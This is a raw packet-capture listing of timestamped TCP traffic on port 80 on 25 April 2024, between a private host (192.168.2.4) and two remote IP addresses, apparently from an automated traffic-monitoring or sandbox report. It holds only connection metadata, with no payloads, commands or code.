Apr 25, 2024 12:16:06.686656952 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.686661959 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686698914 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.686702013 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686713934 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686753988 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686759949 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.686778069 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686822891 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686822891 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.686873913 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686897039 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686917067 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.686939955 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686980009 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686991930 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.687041998 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.687063932 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.687077045 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.687092066 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.687119007 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.894853115 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.894870996 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.894910097 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.894946098 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.894962072 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895019054 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895057917 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.895057917 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.895057917 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.895067930 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895122051 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895169020 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895174980 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.895236969 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895267963 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895279884 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895287991 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.895320892 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.895349979 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895363092 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895401955 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895415068 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.895445108 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895489931 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895504951 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.895514011 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895559072 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895559072 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.895571947 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895626068 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.895638943 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895652056 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895697117 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.895716906 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895739079 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895751953 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895783901 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.895807981 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895855904 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895858049 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.895885944 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895910025 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895936966 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.895956993 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.895999908 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.896007061 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.896047115 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.896095037 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.896106005 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.896121979 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.896174908 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.896198034 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.896210909 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.896245003 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.896261930 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.896275997 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.896286964 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.896298885 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.896322012 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.896352053 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.102865934 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.102902889 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.102915049 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.102957010 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.102971077 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.102997065 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103019953 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103024960 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.103064060 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.103082895 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103096008 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103147984 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.103154898 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103197098 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103257895 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.103260040 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103317976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103355885 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103368044 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.103398085 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103420019 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103450060 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.103465080 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103502989 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103512049 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.103527069 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103585005 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.103589058 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103627920 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103640079 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103688002 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.103694916 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103746891 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.103816032 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103857994 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103869915 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.103905916 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.104044914 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104113102 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104119062 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.104156971 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104186058 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104207039 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.104271889 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104327917 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.104334116 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104356050 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104396105 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104399920 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.104450941 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104480028 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104490995 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104500055 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.104526997 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104542017 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.104552984 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104573965 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104598045 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.104629040 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104670048 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104675055 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.104732037 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104743004 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104799986 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.104808092 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104855061 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104876995 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.104904890 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104949951 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.104954004 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104967117 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.104988098 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105021954 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.105029106 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105077028 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105077982 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.105106115 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105128050 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105154991 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.105201960 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105236053 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105247974 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.105281115 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105334997 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.105390072 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105401993 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105439901 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.105444908 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105472088 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105483055 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105510950 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.105539083 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105560064 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105583906 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.105612040 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105653048 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.105654955 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105678082 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105711937 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105721951 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.105781078 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105812073 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105824947 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.105845928 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105858088 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105895996 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.105918884 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105959892 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.105963945 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.105972052 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.106014967 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.106019974 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.106026888 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.106059074 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.106067896 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.106091976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.106103897 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.106143951 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.106210947 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.106254101 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.310926914 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.310947895 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.310960054 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.310971022 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.310982943 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311028957 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.311053991 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311065912 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311120033 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311129093 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.311129093 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.311161041 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.311167002 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311199903 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311249018 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.311275005 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311307907 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311325073 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311348915 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.311373949 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311424017 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.311436892 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311486959 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311510086 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311536074 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.311554909 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311577082 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311595917 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311633110 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.311650991 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311659098 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.311682940 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311716080 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311736107 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.311764956 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311808109 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311837912 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.311849117 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.311873913 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312072992 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312086105 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312098026 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312117100 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312129021 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312140942 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312145948 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312153101 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312165022 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312166929 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312175989 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312200069 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312210083 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312227011 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312248945 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312273026 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312283993 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312295914 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312306881 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312321901 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312349081 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312355042 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312367916 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312414885 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312423944 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312436104 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312458038 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312469006 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312500954 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312537909 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312556028 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312568903 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312591076 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312602043 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312632084 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312664032 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312669039 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312728882 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312741995 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312752962 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312772036 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312800884 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312803030 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312815905 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312829018 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312853098 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312875032 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312896967 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312918901 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312941074 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.312983990 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.312993050 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.313021898 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.313041925 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.313055038 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.313060045 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.313088894 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.313110113 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.313133001 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.313173056 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.313178062 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.313198090 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.313236952 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.313237906 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.313250065 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.313261986 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.313285112 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.313329935 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:07.313378096 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:07.313400030 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:08.870626926 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.109086037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.109220982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.109280109 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.348207951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.348268986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.348309994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.348345995 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.348368883 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.348381996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.348418951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.348472118 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.348474979 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.348510981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.348520994 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.348546982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.348622084 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.348666906 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.348704100 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.348762035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.587141991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587161064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587172985 CEST	80	49733	176.97.76.106	192.168.2.4
